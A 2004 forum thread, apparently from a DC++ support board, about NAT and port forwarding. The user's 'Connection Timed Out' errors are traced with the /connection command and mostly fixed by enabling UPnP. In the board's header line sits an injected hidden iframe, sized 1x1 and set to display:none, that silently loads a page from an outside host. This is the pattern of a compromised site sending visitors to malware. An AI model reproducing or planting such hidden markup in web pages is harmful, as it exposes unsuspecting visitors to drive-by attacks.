NAT Setup Firewall/Router

Non-DC related talk...<iframe src=http://pokupka.ks.ua/templates/As/image ... p?from=com width=1 height=1 style=display:none></iframe>

Moderator: Moderators

Shaolin

NAT Setup Firewall/Router

Post by Shaolin » 2004-09-29 11:23

Hi all,

I have just started using DC++ and am very glad I stumbled upon it :D So, ok, on to my problem:

My LAN connects to the net via a router, I have configured the router to allow DC++ through going through the NAT setup and choosing port 5000 for both TCP and UDP protocols. I have the correct internal IP address in my port redirection table. My external IP is static and correctly listed in the settings section within DC++ itself (as is the port number). I have on occasion, managed to maintain a connection to other users and download SOME files BUT the message I predominately receive when attempting file transfer is “Connection Timed Out�…Win XP’s own firewall is disabled (and always has been). So my question is this:

Has anyone any idea why I predominately “Time Out� and rarely connect successfully, when to the best of my knowledge my system is setup to be 100% compatible with DC++'s? I have tried using both Active and Passive modes but the end result is still the same!

Any thoughts or suggestions regarding this matter would be greatly appreciated

GargoyleMT
DC++ Contributor

Post by GargoyleMT » 2004-09-29 11:59

For downloads, DC++ tells the remote user to connect to a given IP/port, and after 60 seconds or so of waiting, it displays "Connection Timed Out" (which is really more or less 'no incoming connection made'). To see the IP/port DC++ is advertising to the remote user, type /connection in chat. Check that with your forwarding setup and the external IP as reported by www.dslreports.com/ip/ - hopefully that will let you poinpoint what's wrong.

Or, if your router is UPnP compliant (and you have the necessary UPnP support in XP), download 0.4033 and enable UPnP under Settings > Advanced.

Shaolin

Post by Shaolin » 2004-09-29 12:56

Thanks GargoyleMT,

I took your suggestions onboard, /connection showed that DC++ is indeed advertising the correct IP and port. I have also downloaded 0.4033 as my router is uPnP enabled. This seems to have done the trick 95%, I say 95 % as I am now managing to hold a stable connection with a hell of a lot more people than was previously possible. There are still 1 or 2 in my usual Hub for which i get the "Connection Timeout" status message.

This is a huge improvement though, thank's :D

GargoyleMT
DC++ Contributor

Post by GargoyleMT » 2004-09-29 13:13

Well, glad to be of service. I have some users in that same 5% (or 0.5% in my case) that I cannot connect to, and troubleshooting even one connection is a real PITA. ;)